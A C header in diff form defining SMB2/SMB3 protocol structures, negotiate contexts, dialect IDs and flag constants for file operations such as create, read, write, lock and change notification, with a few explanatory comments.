++#define SMB20_PROT_ID  0x0202
++#define SMB21_PROT_ID  0x0210
++#define SMB2X_PROT_ID  0x02FF
++#define SMB30_PROT_ID  0x0300
++#define SMB302_PROT_ID 0x0302
++#define SMB311_PROT_ID 0x0311
++#define BAD_PROT_ID    0xFFFF
++
++#define SMB311_SALT_SIZE			32
++/* Hash Algorithm Types */
++#define SMB2_PREAUTH_INTEGRITY_SHA512	cpu_to_le16(0x0001)
++#define SMB2_PREAUTH_HASH_SIZE 64
++
++/* Negotiate Contexts - ContextTypes. See MS-SMB2 section 2.2.3.1 for details */
++#define SMB2_PREAUTH_INTEGRITY_CAPABILITIES	cpu_to_le16(1)
++#define SMB2_ENCRYPTION_CAPABILITIES		cpu_to_le16(2)
++#define SMB2_COMPRESSION_CAPABILITIES		cpu_to_le16(3)
++#define SMB2_NETNAME_NEGOTIATE_CONTEXT_ID	cpu_to_le16(5)
++#define SMB2_TRANSPORT_CAPABILITIES		cpu_to_le16(6)
++#define SMB2_RDMA_TRANSFORM_CAPABILITIES	cpu_to_le16(7)
++#define SMB2_SIGNING_CAPABILITIES		cpu_to_le16(8)
++#define SMB2_POSIX_EXTENSIONS_AVAILABLE		cpu_to_le16(0x100)
++
++struct smb2_neg_context {
++	__le16	ContextType;
++	__le16	DataLength;
++	__le32	Reserved;
++	/* Followed by array of data. NOTE: some servers require padding to 8 byte boundary */
++} __packed;
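++
++/*
++ * Worked example of the padding note above: a preauth integrity context
++ * whose DataLength is 38 spans 8 (this header) + 38 = 46 bytes, so two
++ * pad bytes are inserted before the next context to reach the 8 byte
++ * boundary (round_up(46, 8) == 48).
++ */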
++
++/*
++ * The SaltLength that the server sends can be zero, so the only three required
++ * fields (all __le16) end up six bytes total; thus the minimum context data len
++ * in the response is six bytes, which accounts for
++ *
++ *      HashAlgorithmCount, SaltLength, and 1 HashAlgorithm.
++ */
++#define MIN_PREAUTH_CTXT_DATA_LEN 6
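++
++/*
++ * Illustrative check only (not an on-wire definition): the minimum is
++ * exactly the three required __le16 fields.
++ *
++ *	static_assert(3 * sizeof(__le16) == MIN_PREAUTH_CTXT_DATA_LEN);
++ */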
++
++struct smb2_preauth_neg_context {
++	__le16	ContextType; /* 1 */
++	__le16	DataLength;
++	__le32	Reserved;
++	__le16	HashAlgorithmCount; /* 1 */
++	__le16	SaltLength;
++	__le16	HashAlgorithms; /* HashAlgorithms[0] since only one defined */
++	__u8	Salt[SMB311_SALT_SIZE];
++} __packed;
++
++/* Encryption Algorithms Ciphers */
++#define SMB2_ENCRYPTION_AES128_CCM	cpu_to_le16(0x0001)
++#define SMB2_ENCRYPTION_AES128_GCM	cpu_to_le16(0x0002)
++#define SMB2_ENCRYPTION_AES256_CCM      cpu_to_le16(0x0003)
++#define SMB2_ENCRYPTION_AES256_GCM      cpu_to_le16(0x0004)
++
++/* Min encrypt context data is one cipher so 2 bytes + 2 byte count field */
++#define MIN_ENCRYPT_CTXT_DATA_LEN	4
++struct smb2_encryption_neg_context {
++	__le16	ContextType; /* 2 */
++	__le16	DataLength;
++	__le32	Reserved;
++	/* CipherCount usually 2, but can be 3 when AES256-GCM enabled */
++	__le16	CipherCount; /* AES128-GCM and AES128-CCM by default */
++	__le16	Ciphers[];
++} __packed;
++
++/* See MS-SMB2 2.2.3.1.3 */
++#define SMB3_COMPRESS_NONE	cpu_to_le16(0x0000)
++#define SMB3_COMPRESS_LZNT1	cpu_to_le16(0x0001)
++#define SMB3_COMPRESS_LZ77	cpu_to_le16(0x0002)
++#define SMB3_COMPRESS_LZ77_HUFF	cpu_to_le16(0x0003)
++/* Pattern scanning algorithm See MS-SMB2 3.1.4.4.1 */
++#define SMB3_COMPRESS_PATTERN	cpu_to_le16(0x0004) /* Pattern_V1 */
++
++/* Compression Flags */
++#define SMB2_COMPRESSION_CAPABILITIES_FLAG_NONE		cpu_to_le32(0x00000000)
++#define SMB2_COMPRESSION_CAPABILITIES_FLAG_CHAINED	cpu_to_le32(0x00000001)
++
++struct smb2_compression_capabilities_context {
++	__le16	ContextType; /* 3 */
++	__le16  DataLength;
++	__le32	Reserved;
++	__le16	CompressionAlgorithmCount;
++	__le16	Padding;
++	__le32	Flags;
++	__le16	CompressionAlgorithms[3];
++	__u16	Pad;  /* Some servers require pad to DataLen multiple of 8 */
++	/* Check if pad needed */
++} __packed;
++
++/*
++ * For smb2_netname_negotiate_context_id see MS-SMB2 2.2.3.1.4.
++ * Its struct simply contains NetName, an array of Unicode characters.
++ */
++struct smb2_netname_neg_context {
++	__le16	ContextType; /* 5 */
++	__le16	DataLength;
++	__le32	Reserved;
++	__le16	NetName[]; /* hostname of target converted to UCS-2 */
++} __packed;
++
++/*
++ * For smb2_transport_capabilities context see MS-SMB2 2.2.3.1.5
++ * and 2.2.4.1.5
++ */
++
++/* Flags */
++#define SMB2_ACCEPT_TRANSPORT_LEVEL_SECURITY	0x00000001
++
++struct smb2_transport_capabilities_context {
++	__le16	ContextType; /* 6 */
++	__le16  DataLength;
++	__u32	Reserved;
++	__le32	Flags;
++	__u32	Pad;
++} __packed;
++
++/*
++ * For rdma transform capabilities context see MS-SMB2 2.2.3.1.6
++ * and 2.2.4.1.6
++ */
++
++/* RDMA Transform IDs */
++#define SMB2_RDMA_TRANSFORM_NONE	0x0000
++#define SMB2_RDMA_TRANSFORM_ENCRYPTION	0x0001
++#define SMB2_RDMA_TRANSFORM_SIGNING	0x0002
++
++struct smb2_rdma_transform_capabilities_context {
++	__le16	ContextType; /* 7 */
++	__le16  DataLength;
++	__u32	Reserved;
++	__le16	TransformCount;
++	__u16	Reserved1;
++	__u32	Reserved2;
++	__le16	RDMATransformIds[];
++} __packed;
++
++/*
++ * For signing capabilities context see MS-SMB2 2.2.3.1.7
++ * and 2.2.4.1.7
++ */
++
++/* Signing algorithms */
++#define SIGNING_ALG_HMAC_SHA256    0
++#define SIGNING_ALG_HMAC_SHA256_LE cpu_to_le16(0)
++#define SIGNING_ALG_AES_CMAC       1
++#define SIGNING_ALG_AES_CMAC_LE    cpu_to_le16(1)
++#define SIGNING_ALG_AES_GMAC       2
++#define SIGNING_ALG_AES_GMAC_LE    cpu_to_le16(2)
++
++struct smb2_signing_capabilities {
++	__le16	ContextType; /* 8 */
++	__le16	DataLength;
++	__le32	Reserved;
++	__le16	SigningAlgorithmCount;
++	__le16	SigningAlgorithms[];
++	/*  Followed by padding to 8 byte boundary (required by some servers) */
++} __packed;
++
++#define POSIX_CTXT_DATA_LEN	16
++struct smb2_posix_neg_context {
++	__le16	ContextType; /* 0x100 */
++	__le16	DataLength;
++	__le32	Reserved;
++	__u8	Name[16]; /* POSIX ctxt GUID 93AD25509CB411E7B42383DE968BCD7C */
++} __packed;
++
++struct smb2_negotiate_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 36 */
++	__le16 DialectCount;
++	__le16 SecurityMode;
++	__le16 Reserved;	/* MBZ */
++	__le32 Capabilities;
++	__u8   ClientGUID[SMB2_CLIENT_GUID_SIZE];
++	/* In SMB3.02 and earlier the next three fields were an MBZ le64 ClientStartTime */
++	__le32 NegotiateContextOffset; /* SMB3.1.1 only. MBZ earlier */
++	__le16 NegotiateContextCount;  /* SMB3.1.1 only. MBZ earlier */
++	__le16 Reserved2;
++	__le16 Dialects[];
++} __packed;
++
++struct smb2_negotiate_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 65 */
++	__le16 SecurityMode;
++	__le16 DialectRevision;
++	__le16 NegotiateContextCount;	/* Prior to SMB3.1.1 was Reserved & MBZ */
++	__u8   ServerGUID[16];
++	__le32 Capabilities;
++	__le32 MaxTransactSize;
++	__le32 MaxReadSize;
++	__le32 MaxWriteSize;
++	__le64 SystemTime;	/* MBZ */
++	__le64 ServerStartTime;
++	__le16 SecurityBufferOffset;
++	__le16 SecurityBufferLength;
++	__le32 NegotiateContextOffset;	/* Pre-SMB3.1.1 was reserved/ignored */
++	__u8   Buffer[1];	/* variable length GSS security buffer */
++} __packed;
++
++
++/*
++ * SMB2_SESSION_SETUP  See MS-SMB2 section 2.2.5
++ */
++/* Flags */
++#define SMB2_SESSION_REQ_FLAG_BINDING		0x01
++#define SMB2_SESSION_REQ_FLAG_ENCRYPT_DATA	0x04
++
++struct smb2_sess_setup_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 25 */
++	__u8   Flags;
++	__u8   SecurityMode;
++	__le32 Capabilities;
++	__le32 Channel;
++	__le16 SecurityBufferOffset;
++	__le16 SecurityBufferLength;
++	__le64 PreviousSessionId;
++	__u8   Buffer[1];	/* variable length GSS security buffer */
++} __packed;
++
++/* Currently defined SessionFlags */
++#define SMB2_SESSION_FLAG_IS_GUEST        0x0001
++#define SMB2_SESSION_FLAG_IS_GUEST_LE     cpu_to_le16(0x0001)
++#define SMB2_SESSION_FLAG_IS_NULL         0x0002
++#define SMB2_SESSION_FLAG_IS_NULL_LE      cpu_to_le16(0x0002)
++#define SMB2_SESSION_FLAG_ENCRYPT_DATA    0x0004
++#define SMB2_SESSION_FLAG_ENCRYPT_DATA_LE cpu_to_le16(0x0004)
++
++struct smb2_sess_setup_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 9 */
++	__le16 SessionFlags;
++	__le16 SecurityBufferOffset;
++	__le16 SecurityBufferLength;
++	__u8   Buffer[1];	/* variable length GSS security buffer */
++} __packed;
++
++
++/*
++ * SMB2_LOGOFF  See MS-SMB2 section 2.2.7
++ */
++struct smb2_logoff_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 4 */
++	__le16 Reserved;
++} __packed;
++
++struct smb2_logoff_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 4 */
++	__le16 Reserved;
++} __packed;
++
++
++/*
++ * SMB2_CLOSE  See MS-SMB2 section 2.2.15
++ */
++/* Currently defined values for close flags */
++#define SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB	cpu_to_le16(0x0001)
++struct smb2_close_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 24 */
++	__le16 Flags;
++	__le32 Reserved;
++	__u64  PersistentFileId; /* opaque endianness */
++	__u64  VolatileFileId; /* opaque endianness */
++} __packed;
++
++/*
++ * Maximum size of an SMB2_CLOSE response is 64 (smb2 header) + 60 (data)
++ */
++#define MAX_SMB2_CLOSE_RESPONSE_SIZE 124
++
++struct smb2_close_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* 60 */
++	__le16 Flags;
++	__le32 Reserved;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 AllocationSize;	/* Beginning of FILE_STANDARD_INFO equivalent */
++	__le64 EndOfFile;
++	__le32 Attributes;
++} __packed;
++
++
++/*
++ * SMB2_READ  See MS-SMB2 section 2.2.19
++ */
++/* For the read request Flags field below, the following flags are defined: */
++#define SMB2_READFLAG_READ_UNBUFFERED	 0x01 /* SMB3.02 or later */
++#define SMB2_READFLAG_REQUEST_COMPRESSED 0x02 /* See MS-SMB2 2.2.19 */
++
++/* Channel field for read and write: exactly one of the following flags can be set */
++#define SMB2_CHANNEL_NONE               cpu_to_le32(0x00000000)
++#define SMB2_CHANNEL_RDMA_V1            cpu_to_le32(0x00000001)
++#define SMB2_CHANNEL_RDMA_V1_INVALIDATE cpu_to_le32(0x00000002)
++#define SMB2_CHANNEL_RDMA_TRANSFORM     cpu_to_le32(0x00000003)
++
++/* SMB2 read request without RFC1001 length at the beginning */
++struct smb2_read_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 49 */
++	__u8   Padding; /* offset from start of SMB2 header to place read */
++	__u8   Flags; /* MBZ unless SMB3.02 or later */
++	__le32 Length;
++	__le64 Offset;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__le32 MinimumCount;
++	__le32 Channel; /* MBZ except for SMB3 or later */
++	__le32 RemainingBytes;
++	__le16 ReadChannelInfoOffset;
++	__le16 ReadChannelInfoLength;
++	__u8   Buffer[1];
++} __packed;
++
++/* Read flags */
++#define SMB2_READFLAG_RESPONSE_NONE            cpu_to_le32(0x00000000)
++#define SMB2_READFLAG_RESPONSE_RDMA_TRANSFORM  cpu_to_le32(0x00000001)
++
++struct smb2_read_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 17 */
++	__u8   DataOffset;
++	__u8   Reserved;
++	__le32 DataLength;
++	__le32 DataRemaining;
++	__le32 Flags;
++	__u8   Buffer[1];
++} __packed;
++
++
++/*
++ * SMB2_WRITE  See MS-SMB2 section 2.2.21
++ */
++/* For the write request Flags field below, the following flags are defined: */
++#define SMB2_WRITEFLAG_WRITE_THROUGH	0x00000001	/* SMB2.1 or later */
++#define SMB2_WRITEFLAG_WRITE_UNBUFFERED	0x00000002	/* SMB3.02 or later */
++
++struct smb2_write_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 49 */
++	__le16 DataOffset; /* offset from start of SMB2 header to write data */
++	__le32 Length;
++	__le64 Offset;
++	__u64  PersistentFileId; /* opaque endianness */
++	__u64  VolatileFileId; /* opaque endianness */
++	__le32 Channel; /* MBZ unless SMB3.02 or later */
++	__le32 RemainingBytes;
++	__le16 WriteChannelInfoOffset;
++	__le16 WriteChannelInfoLength;
++	__le32 Flags;
++	__u8   Buffer[1];
++} __packed;
++
++struct smb2_write_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 17 */
++	__u8   DataOffset;
++	__u8   Reserved;
++	__le32 DataLength;
++	__le32 DataRemaining;
++	__u32  Reserved2;
++	__u8   Buffer[1];
++} __packed;
++
++
++/*
++ * SMB2_FLUSH  See MS-SMB2 section 2.2.17
++ */
++struct smb2_flush_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 24 */
++	__le16 Reserved1;
++	__le32 Reserved2;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++} __packed;
++
++struct smb2_flush_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;
++	__le16 Reserved;
++} __packed;
++
++#define SMB2_LOCKFLAG_SHARED		0x0001
++#define SMB2_LOCKFLAG_EXCLUSIVE		0x0002
++#define SMB2_LOCKFLAG_UNLOCK		0x0004
++#define SMB2_LOCKFLAG_FAIL_IMMEDIATELY	0x0010
++#define SMB2_LOCKFLAG_MASK		0x0007
++
++struct smb2_lock_element {
++	__le64 Offset;
++	__le64 Length;
++	__le32 Flags;
++	__le32 Reserved;
++} __packed;
++
++struct smb2_lock_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 48 */
++	__le16 LockCount;
++	/*
++	 * The least significant four bits are the index, the other 28 bits are
++	 * the lock sequence number (0 to 64). See MS-SMB2 2.2.26
++	 */
++	__le32 LockSequenceNumber;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	/* Followed by at least one */
++	struct smb2_lock_element locks[1];
++} __packed;
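++
++/*
++ * Illustrative sketch of the LockSequenceNumber packing described above;
++ * smb2_lock_sequence() is a hypothetical helper, not part of the
++ * protocol definitions.
++ *
++ *	static inline __le32 smb2_lock_sequence(u32 index, u32 seq)
++ *	{
++ *		return cpu_to_le32((index & 0xF) | (seq << 4));
++ *	}
++ */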
++
++struct smb2_lock_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 4 */
++	__le16 Reserved;
++} __packed;
++
++struct smb2_echo_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 4 */
++	__u16  Reserved;
++} __packed;
++
++struct smb2_echo_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 4 */
++	__u16  Reserved;
++} __packed;
++
++/*
++ * Valid FileInformation classes for query directory
++ *
++ * Note that these are a subset of the (file) QUERY_INFO levels defined
++ * later in this file (but since QUERY_DIRECTORY uses equivalent numbers
++ * we do not redefine them here)
++ *
++ * FileDirectoryInformation		0x01
++ * FileFullDirectoryInformation		0x02
++ * FileIdFullDirectoryInformation	0x26
++ * FileBothDirectoryInformation		0x03
++ * FileIdBothDirectoryInformation	0x25
++ * FileNamesInformation			0x0C
++ * FileIdExtdDirectoryInformation	0x3C
++ */
++
++/* search (query_directory) Flags field */
++#define SMB2_RESTART_SCANS		0x01
++#define SMB2_RETURN_SINGLE_ENTRY	0x02
++#define SMB2_INDEX_SPECIFIED		0x04
++#define SMB2_REOPEN			0x10
++
++struct smb2_query_directory_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 33 */
++	__u8   FileInformationClass;
++	__u8   Flags;
++	__le32 FileIndex;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__le16 FileNameOffset;
++	__le16 FileNameLength;
++	__le32 OutputBufferLength;
++	__u8   Buffer[1];
++} __packed;
++
++struct smb2_query_directory_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 9 */
++	__le16 OutputBufferOffset;
++	__le32 OutputBufferLength;
++	__u8   Buffer[1];
++} __packed;
++
++/*
++ * Maximum number of iovs we need for a set-info request.
++ * The largest one is rename/hardlink
++ * [0] : struct smb2_set_info_req + smb2_file_[rename|link]_info
++ * [1] : path
++ * [2] : compound padding
++ */
++#define SMB2_SET_INFO_IOV_SIZE 3
++
++struct smb2_set_info_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 33 */
++	__u8   InfoType;
++	__u8   FileInfoClass;
++	__le32 BufferLength;
++	__le16 BufferOffset;
++	__u16  Reserved;
++	__le32 AdditionalInformation;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__u8   Buffer[1];
++} __packed;
++
++struct smb2_set_info_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 2 */
++} __packed;
++
++/*
++ * SMB2_NOTIFY  See MS-SMB2 section 2.2.35
++ */
++/* notify flags */
++#define SMB2_WATCH_TREE			0x0001
++
++/* notify completion filter flags. See MS-FSCC 2.6 and MS-SMB2 2.2.35 */
++#define FILE_NOTIFY_CHANGE_FILE_NAME		0x00000001
++#define FILE_NOTIFY_CHANGE_DIR_NAME		0x00000002
++#define FILE_NOTIFY_CHANGE_ATTRIBUTES		0x00000004
++#define FILE_NOTIFY_CHANGE_SIZE			0x00000008
++#define FILE_NOTIFY_CHANGE_LAST_WRITE		0x00000010
++#define FILE_NOTIFY_CHANGE_LAST_ACCESS		0x00000020
++#define FILE_NOTIFY_CHANGE_CREATION		0x00000040
++#define FILE_NOTIFY_CHANGE_EA			0x00000080
++#define FILE_NOTIFY_CHANGE_SECURITY		0x00000100
++#define FILE_NOTIFY_CHANGE_STREAM_NAME		0x00000200
++#define FILE_NOTIFY_CHANGE_STREAM_SIZE		0x00000400
++#define FILE_NOTIFY_CHANGE_STREAM_WRITE		0x00000800
++
++/* SMB2 Notify Action Flags */
++#define FILE_ACTION_ADDED                       0x00000001
++#define FILE_ACTION_REMOVED                     0x00000002
++#define FILE_ACTION_MODIFIED                    0x00000003
++#define FILE_ACTION_RENAMED_OLD_NAME            0x00000004
++#define FILE_ACTION_RENAMED_NEW_NAME            0x00000005
++#define FILE_ACTION_ADDED_STREAM                0x00000006
++#define FILE_ACTION_REMOVED_STREAM              0x00000007
++#define FILE_ACTION_MODIFIED_STREAM             0x00000008
++#define FILE_ACTION_REMOVED_BY_DELETE           0x00000009
++
++struct smb2_change_notify_req {
++	struct smb2_hdr hdr;
++	__le16	StructureSize;
++	__le16	Flags;
++	__le32	OutputBufferLength;
++	__u64	PersistentFileId; /* opaque endianness */
++	__u64	VolatileFileId; /* opaque endianness */
++	__le32	CompletionFilter;
++	__u32	Reserved;
++} __packed;
++
++struct smb2_change_notify_rsp {
++	struct smb2_hdr hdr;
++	__le16	StructureSize;  /* Must be 9 */
++	__le16	OutputBufferOffset;
++	__le32	OutputBufferLength;
++	__u8	Buffer[1]; /* array of file notify structs */
++} __packed;
++
++
++/*
++ * SMB2_CREATE  See MS-SMB2 section 2.2.13
++ */
++/* Oplock levels */
++#define SMB2_OPLOCK_LEVEL_NONE		0x00
++#define SMB2_OPLOCK_LEVEL_II		0x01
++#define SMB2_OPLOCK_LEVEL_EXCLUSIVE	0x08
++#define SMB2_OPLOCK_LEVEL_BATCH		0x09
++#define SMB2_OPLOCK_LEVEL_LEASE		0xFF
++/* Non-spec internal type */
++#define SMB2_OPLOCK_LEVEL_NOCHANGE	0x99
++
++/* Impersonation Levels. See MS-WPO section 9.7 and MSDN-IMPERS */
++#define IL_ANONYMOUS		cpu_to_le32(0x00000000)
++#define IL_IDENTIFICATION	cpu_to_le32(0x00000001)
++#define IL_IMPERSONATION	cpu_to_le32(0x00000002)
++#define IL_DELEGATE		cpu_to_le32(0x00000003)
++
++/* File Attributes */
++#define FILE_ATTRIBUTE_READONLY			0x00000001
++#define FILE_ATTRIBUTE_HIDDEN			0x00000002
++#define FILE_ATTRIBUTE_SYSTEM			0x00000004
++#define FILE_ATTRIBUTE_DIRECTORY		0x00000010
++#define FILE_ATTRIBUTE_ARCHIVE			0x00000020
++#define FILE_ATTRIBUTE_NORMAL			0x00000080
++#define FILE_ATTRIBUTE_TEMPORARY		0x00000100
++#define FILE_ATTRIBUTE_SPARSE_FILE		0x00000200
++#define FILE_ATTRIBUTE_REPARSE_POINT		0x00000400
++#define FILE_ATTRIBUTE_COMPRESSED		0x00000800
++#define FILE_ATTRIBUTE_OFFLINE			0x00001000
++#define FILE_ATTRIBUTE_NOT_CONTENT_INDEXED	0x00002000
++#define FILE_ATTRIBUTE_ENCRYPTED		0x00004000
++#define FILE_ATTRIBUTE_INTEGRITY_STREAM		0x00008000
++#define FILE_ATTRIBUTE_NO_SCRUB_DATA		0x00020000
++#define FILE_ATTRIBUTE__MASK			0x00007FB7
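++/*
++ * Note that the mask above ORs READONLY through ENCRYPTED; INTEGRITY_STREAM
++ * (0x00008000) and NO_SCRUB_DATA (0x00020000) fall outside it.
++ */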
++
++#define FILE_ATTRIBUTE_READONLY_LE              cpu_to_le32(0x00000001)
++#define FILE_ATTRIBUTE_HIDDEN_LE		cpu_to_le32(0x00000002)
++#define FILE_ATTRIBUTE_SYSTEM_LE		cpu_to_le32(0x00000004)
++#define FILE_ATTRIBUTE_DIRECTORY_LE		cpu_to_le32(0x00000010)
++#define FILE_ATTRIBUTE_ARCHIVE_LE		cpu_to_le32(0x00000020)
++#define FILE_ATTRIBUTE_NORMAL_LE		cpu_to_le32(0x00000080)
++#define FILE_ATTRIBUTE_TEMPORARY_LE		cpu_to_le32(0x00000100)
++#define FILE_ATTRIBUTE_SPARSE_FILE_LE		cpu_to_le32(0x00000200)
++#define FILE_ATTRIBUTE_REPARSE_POINT_LE		cpu_to_le32(0x00000400)
++#define FILE_ATTRIBUTE_COMPRESSED_LE		cpu_to_le32(0x00000800)
++#define FILE_ATTRIBUTE_OFFLINE_LE		cpu_to_le32(0x00001000)
++#define FILE_ATTRIBUTE_NOT_CONTENT_INDEXED_LE	cpu_to_le32(0x00002000)
++#define FILE_ATTRIBUTE_ENCRYPTED_LE		cpu_to_le32(0x00004000)
++#define FILE_ATTRIBUTE_INTEGRITY_STREAM_LE	cpu_to_le32(0x00008000)
++#define FILE_ATTRIBUTE_NO_SCRUB_DATA_LE		cpu_to_le32(0x00020000)
++#define FILE_ATTRIBUTE_MASK_LE			cpu_to_le32(0x00007FB7)
++
++/* Desired Access Flags */
++#define FILE_READ_DATA_LE		cpu_to_le32(0x00000001)
++#define FILE_LIST_DIRECTORY_LE		cpu_to_le32(0x00000001)
++#define FILE_WRITE_DATA_LE		cpu_to_le32(0x00000002)
++#define FILE_APPEND_DATA_LE		cpu_to_le32(0x00000004)
++#define FILE_ADD_SUBDIRECTORY_LE	cpu_to_le32(0x00000004)
++#define FILE_READ_EA_LE			cpu_to_le32(0x00000008)
++#define FILE_WRITE_EA_LE		cpu_to_le32(0x00000010)
++#define FILE_EXECUTE_LE			cpu_to_le32(0x00000020)
++#define FILE_DELETE_CHILD_LE		cpu_to_le32(0x00000040)
++#define FILE_READ_ATTRIBUTES_LE		cpu_to_le32(0x00000080)
++#define FILE_WRITE_ATTRIBUTES_LE	cpu_to_le32(0x00000100)
++#define FILE_DELETE_LE			cpu_to_le32(0x00010000)
++#define FILE_READ_CONTROL_LE		cpu_to_le32(0x00020000)
++#define FILE_WRITE_DAC_LE		cpu_to_le32(0x00040000)
++#define FILE_WRITE_OWNER_LE		cpu_to_le32(0x00080000)
++#define FILE_SYNCHRONIZE_LE		cpu_to_le32(0x00100000)
++#define FILE_ACCESS_SYSTEM_SECURITY_LE	cpu_to_le32(0x01000000)
++#define FILE_MAXIMAL_ACCESS_LE		cpu_to_le32(0x02000000)
++#define FILE_GENERIC_ALL_LE		cpu_to_le32(0x10000000)
++#define FILE_GENERIC_EXECUTE_LE		cpu_to_le32(0x20000000)
++#define FILE_GENERIC_WRITE_LE		cpu_to_le32(0x40000000)
++#define FILE_GENERIC_READ_LE		cpu_to_le32(0x80000000)
++#define DESIRED_ACCESS_MASK             cpu_to_le32(0xF21F01FF)
++
++
++#define FILE_READ_DESIRED_ACCESS_LE     (FILE_READ_DATA_LE        |	\
++					 FILE_READ_EA_LE          |     \
++					 FILE_GENERIC_READ_LE)
++#define FILE_WRITE_DESIRE_ACCESS_LE     (FILE_WRITE_DATA_LE       |	\
++					 FILE_APPEND_DATA_LE      |	\
++					 FILE_WRITE_EA_LE         |	\
++					 FILE_WRITE_ATTRIBUTES_LE |	\
++					 FILE_GENERIC_WRITE_LE)
++
++/* ShareAccess Flags */
++#define FILE_SHARE_READ_LE		cpu_to_le32(0x00000001)
++#define FILE_SHARE_WRITE_LE		cpu_to_le32(0x00000002)
++#define FILE_SHARE_DELETE_LE		cpu_to_le32(0x00000004)
++#define FILE_SHARE_ALL_LE		cpu_to_le32(0x00000007)
++
++/* CreateDisposition Flags */
++#define FILE_SUPERSEDE_LE		cpu_to_le32(0x00000000)
++#define FILE_OPEN_LE			cpu_to_le32(0x00000001)
++#define FILE_CREATE_LE			cpu_to_le32(0x00000002)
++#define	FILE_OPEN_IF_LE			cpu_to_le32(0x00000003)
++#define FILE_OVERWRITE_LE		cpu_to_le32(0x00000004)
++#define FILE_OVERWRITE_IF_LE		cpu_to_le32(0x00000005)
++#define FILE_CREATE_MASK_LE             cpu_to_le32(0x00000007)
++
++#define FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA \
++			| FILE_READ_ATTRIBUTES)
++#define FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
++			| FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES)
++#define FILE_EXEC_RIGHTS (FILE_EXECUTE)
++
++/* CreateOptions Flags */
++#define FILE_DIRECTORY_FILE_LE		cpu_to_le32(0x00000001)
++/* same as #define CREATE_NOT_FILE_LE	cpu_to_le32(0x00000001) */
++#define FILE_WRITE_THROUGH_LE		cpu_to_le32(0x00000002)
++#define FILE_SEQUENTIAL_ONLY_LE		cpu_to_le32(0x00000004)
++#define FILE_NO_INTERMEDIATE_BUFFERING_LE cpu_to_le32(0x00000008)
++#define FILE_NON_DIRECTORY_FILE_LE	cpu_to_le32(0x00000040)
++#define FILE_COMPLETE_IF_OPLOCKED_LE	cpu_to_le32(0x00000100)
++#define FILE_NO_EA_KNOWLEDGE_LE		cpu_to_le32(0x00000200)
++#define FILE_RANDOM_ACCESS_LE		cpu_to_le32(0x00000800)
++#define FILE_DELETE_ON_CLOSE_LE		cpu_to_le32(0x00001000)
++#define FILE_OPEN_BY_FILE_ID_LE		cpu_to_le32(0x00002000)
++#define FILE_OPEN_FOR_BACKUP_INTENT_LE	cpu_to_le32(0x00004000)
++#define FILE_NO_COMPRESSION_LE		cpu_to_le32(0x00008000)
++#define FILE_OPEN_REPARSE_POINT_LE	cpu_to_le32(0x00200000)
++#define FILE_OPEN_NO_RECALL_LE		cpu_to_le32(0x00400000)
++#define CREATE_OPTIONS_MASK_LE          cpu_to_le32(0x00FFFFFF)
++
++#define FILE_READ_RIGHTS_LE (FILE_READ_DATA_LE | FILE_READ_EA_LE \
++			| FILE_READ_ATTRIBUTES_LE)
++#define FILE_WRITE_RIGHTS_LE (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE \
++			| FILE_WRITE_EA_LE | FILE_WRITE_ATTRIBUTES_LE)
++#define FILE_EXEC_RIGHTS_LE (FILE_EXECUTE_LE)
++
++/* Create Context Values */
++#define SMB2_CREATE_EA_BUFFER			"ExtA" /* extended attributes */
++#define SMB2_CREATE_SD_BUFFER			"SecD" /* security descriptor */
++#define SMB2_CREATE_DURABLE_HANDLE_REQUEST	"DHnQ"
++#define SMB2_CREATE_DURABLE_HANDLE_RECONNECT	"DHnC"
++#define SMB2_CREATE_ALLOCATION_SIZE		"AISi"
++#define SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST "MxAc"
++#define SMB2_CREATE_TIMEWARP_REQUEST		"TWrp"
++#define SMB2_CREATE_QUERY_ON_DISK_ID		"QFid"
++#define SMB2_CREATE_REQUEST_LEASE		"RqLs"
++#define SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2	"DH2Q"
++#define SMB2_CREATE_DURABLE_HANDLE_RECONNECT_V2	"DH2C"
++#define SMB2_CREATE_TAG_POSIX		"\x93\xAD\x25\x50\x9C\xB4\x11\xE7\xB4\x23\x83\xDE\x96\x8B\xCD\x7C"
++#define SMB2_CREATE_APP_INSTANCE_ID	"\x45\xBC\xA6\x6A\xEF\xA7\xF7\x4A\x90\x08\xFA\x46\x2E\x14\x4D\x74"
